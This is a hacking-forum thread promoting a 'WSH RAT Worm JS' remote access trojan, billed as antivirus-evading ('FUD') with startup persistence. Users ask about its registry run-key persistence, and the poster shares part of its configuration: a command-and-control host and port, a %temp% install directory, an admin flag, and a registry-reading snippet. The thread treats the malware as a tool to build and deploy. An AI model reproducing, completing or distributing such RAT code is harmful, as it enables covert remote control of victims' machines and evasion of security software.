WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 05-16-2020, 02:17 AM
#1
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
| WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 filter_list | |
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
RE: WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 05-16-2020, 05:11 AM
#2
I haven't got time to view the video, so I'm just curious as to where It adds Itself In Startup?
I assume In the run directories of the HKCU & HKLM registry hives?
I assume In the run directories of the HKCU & HKLM registry hives?
![[Image: AD83g1A.png]](http://i.imgur.com/AD83g1A.png)
RE: WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 05-16-2020, 09:26 AM
#4
(05-16-2020, 08:39 AM)hellboydz Wrote:(05-16-2020, 05:11 AM)mothered Wrote: I haven't got time to view the video, so I'm just curious as to where It adds Itself In Startup?I'm not sure but by the way check is code when. You build u will got it
I assume In the run directories of the HKCU & HKLM registry hives?
No problem at all, I'll look Into It shortly.
Thanks for the reply.
RE: WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 05-16-2020, 04:18 PM
#5
(05-16-2020, 09:26 AM)mothered Wrote:Let me explain it(05-16-2020, 08:39 AM)hellboydz Wrote:(05-16-2020, 05:11 AM)mothered Wrote: I haven't got time to view the video, so I'm just curious as to where It adds Itself In Startup?I'm not sure but by the way check is code when. You build u will got it
I assume In the run directories of the HKCU & HKLM registry hives?
No problem at all, I'll look Into It shortly.
Thanks for the reply.
RE: WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 05-16-2020, 04:26 PM
#6
(05-16-2020, 04:18 PM)hellboydz Wrote:(05-16-2020, 09:26 AM)mothered Wrote:Let me explain it(05-16-2020, 08:39 AM)hellboydz Wrote: I'm not sure but by the way check is code when. You build u will got it
No problem at all, I'll look Into It shortly.
Thanks for the reply.
Please do.
RE: WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 05-16-2020, 07:06 PM
#7
(05-16-2020, 04:26 PM)mothered Wrote:(05-16-2020, 04:18 PM)hellboydz Wrote:(05-16-2020, 09:26 AM)mothered Wrote: No problem at all, I'll look Into It shortly.Let me explain it
Thanks for the reply.
Please do.
//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
var host = "192.168.168.248";
var port = 1330;
var installdir = "%temp%"; // store in temp if you something change it easy becuase open source
var runAsAdmin = false; // this is will be not run as administrator when start
here : try{fileicon = shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.split(".")[file.name.split(".").length - 1]+ "\\") + "\\defaulticon\\"); }catch(eeee){}
did you see here its config
(This post was last modified: 05-16-2020, 07:07 PM by hellboydz.)
RE: WSH RAT Worm JS | Javascript Bypass FUD + Startup 2020 05-17-2020, 03:26 AM
#8
(05-16-2020, 07:06 PM)hellboydz Wrote:(05-16-2020, 04:26 PM)mothered Wrote:(05-16-2020, 04:18 PM)hellboydz Wrote: Let me explain it
Please do.
//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
var host = "192.168.168.248";
var port = 1330;
var installdir = "%temp%"; // store in temp if you something change it easy becuase open source
var runAsAdmin = false; // this is will be not run as administrator when start
here : try{fileicon = shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.split(".")[file.name.split(".").length - 1]+ "\\") + "\\defaulticon\\"); }catch(eeee){}
did you see here its config
Nice.
Appreciate your time to provide the details.
Users browsing this thread: 1 Guest(s)